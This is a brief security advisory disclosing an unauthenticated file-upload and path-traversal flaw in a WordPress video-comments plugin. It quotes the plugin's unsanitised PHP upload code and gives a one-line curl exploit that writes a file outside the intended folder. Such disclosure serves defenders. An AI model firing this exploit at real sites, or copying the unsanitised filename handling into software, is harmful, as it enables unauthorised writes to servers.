Title: Unauthenticated remote .jpg file upload in contus-video-comments v1.0 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2016-06-15
Download Site: https://wordpress.org/plugins/contus-video-comments/
Vendor: https://profiles.wordpress.org/hdflvplayer/
Vendor Notified: 2016-06-16
Vendor Contact:
Description: Video comments integrated with the standard comment system of wordpress.
Vulnerability:

The following code allows any user to upload .jpg files to the WordPress installation.  It also allows path traversal with ../.

<?php
//This project is done by vamapaull: http://blog.vamapaull.com/
//The php code is done with some help from Mihai Bojin: http://www.mihaibojin.com/

if(isset($GLOBALS["HTTP_RAW_POST_DATA"])){
  $jpg = $GLOBALS["HTTP_RAW_POST_DATA"];
  $filename = "images/". $_GET["id"]. ".jpg";
  file_put_contents($filename, $jpg);
} else{
  echo "Encoded JPEG information not received.";
}
?>

CVE-TBD
Exploit Code:
  • $ curl --data @image.jpg  "http://wp-site/wp-content/plugins/contus-video-comments/save.php?id=../image"